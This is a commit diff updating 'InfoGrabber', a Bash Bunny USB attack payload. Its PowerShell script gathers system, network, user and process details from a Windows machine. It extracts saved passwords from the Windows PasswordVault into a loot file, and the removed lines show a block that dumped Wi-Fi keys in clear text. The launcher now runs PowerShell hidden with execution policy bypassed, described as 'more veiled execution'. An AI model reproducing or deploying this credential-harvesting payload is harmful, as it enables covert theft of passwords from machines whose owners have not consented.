Updated InfoGrabber payload (#279)

payloads/library/recon/InfoGrabber/info.ps1

@@ -1,8 +1,9 @@
 # Shows details of currently running PC
-# Simen Kjeserud (Original creator), Gachnang
+# Simen Kjeserud (Original creator), Gachnang, DannyK999 (Version 2.0)
 
 #Get info about pc
 
+# Get IP / Nework Info
 try
 {
 $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
@@ -21,6 +22,7 @@ $IsDHCPEnabled = $true
 [string[]]$computerMAC =$Network.MACAddress
 }
 
+#Get System Info
 $computerSystem = Get-CimInstance CIM_ComputerSystem
 $computerBIOS = Get-CimInstance CIM_BIOSElement
 
@@ -47,11 +49,10 @@ if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").
 	$RDP = "RDP is NOT enabled" 
 }
 
-# Get network interfaces
+# Get Network Interfaces
-#| where { $_.ipaddress -notlike $null } 
 $Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null }  | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress 
 
-# Get wifi SSID and password	
+# Get wifi SSIDs and Passwords	
 $WLANProfileNames =@()
 #Get all the WLAN profile names
 $Output = netsh.exe wlan show profiles | Select-String -pattern " : "
@@ -82,8 +83,7 @@ $luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Na
 # process first
 $process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine
 
-# get listeners / ActiveTcpConnections
+# Get Listeners / ActiveTcpConnections
-#[System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties().GetActiveTcpConnections() | Format-Table -AutoSize
 $listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
 $listener = $listener | foreach-object {
     $listenerItem = $_
@@ -113,29 +113,7 @@ $drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $nu
 # videocard
 $videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution
 
-#Get installed passwords
+#Get stored passwords
-$profileRows = $output | Select-String -Pattern 'All User Profile'
-$profileNames = New-Object System.Collections.ArrayList
-for($i = 0; $i -lt $profileRows.Count; $i++){
-$profileName = ($profileRows[$i] -split ":")[-1].Trim()
-$profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear 
-$SSIDSearchResult = $profileOutput| Select-String -Pattern 'SSID Name'
-$profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"'
-$passwordSearchResult = $profileOutput| Select-String -Pattern 'Key Content'
-if($passwordSearchResult){
-$profilePw = ($passwordSearchResult -split ":")[-1].Trim()
-} else {
-$profilePw = ''
-}
-$networkObject = New-Object -TypeName psobject -Property @{
-ProfileName = $profileName
-SSID = $profileSSID
-Password = $profilePw
-}
-$profileNames.Add($networkObject)
-}
-$profileNames.Add($networkObject)
-
 [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
 $vault = New-Object Windows.Security.Credentials.PasswordVault 
 $vault = $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }
@@ -210,5 +188,3 @@ $computerSystem.Name
 "Windows/user passwords"
 "=================================================================="
 $vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize
-
-

payloads/library/recon/InfoGrabber/payload.txt

@@ -1,10 +1,11 @@
 #!/bin/bash
 #
-# Title:         Info_Grabber
+# Title:            Info_Grabber
-# Author:        Simen Kjeserud
+# Original Author:  Simen Kjeserud
-# Version:       1.0
+# V2.0 Author:      DannyK999
-# Target:        Windows
+# Version:          2.0
-# Creds:         Hak5Darren for inspiration
+# Target:           Windows
+# Creds:            Hak5Darren, Hak5 and Simen Kjeserud for inspiration
 # 
 # Executes run.ps1 which executes scripts that gets you information about
 # the computer running and will also get wifi passwords
@@ -15,9 +16,6 @@ ATTACKMODE HID STORAGE
 GET SWITCH_POSITION
 
 LED ATTACK
-QUACK GUI r
+# Run the run.ps1 script in the BashBunny
-QUACK DELAY 200
+RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
-# Open run and run the run.ps1 script in the Bashbunny
-QUACK STRING powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
-QUACK ENTER
 LED FINISH

payloads/library/recon/InfoGrabber/readme.md

@@ -1,10 +1,13 @@
-# InfoGrabber for the Bunnys
+# Info Grabber for the BashBunny
 
-Author: Simen Kjeserud
+Original Author Simen Kjeserud
 
-Version: Version 1.0
+V2.0 Author: DannyK999
+
+Version: Version 2.0
+
+Credit: Hak5Darren, Hak5 and Simen Kjeserud for inspiration
 
-Credit: Hak5Darren for inspiration
 
                ((`\
             ___ \\ '--._
@@ -12,13 +15,15 @@ Credit: Hak5Darren for inspiration
         /    \   '. __.'
        _|    /_  \ \_\_
       {_\______\-'\__\_\
-	  Check out my website:
+	  Check out Simen's website:
 	  aknemis.com
 
 ## Description
 
 Gather a lot of information about the computer and place it in a text file in loot/info/.
 
+Updates include code/output cleanup, faster runtime, and more veiled execution.
+
 Here you can se what it will look like:
 
 
@@ -64,10 +69,6 @@ Here you can se what it will look like:
 
 Made for windows. The only thing you will need to change is the Ducky language so it matches the keyboard input.
 
-## Requirements
-
-DuckyTools for the BashBunny, and you need to change to the language the computer uses.
-
 ## STATUS
 
 | LED              | Status                                |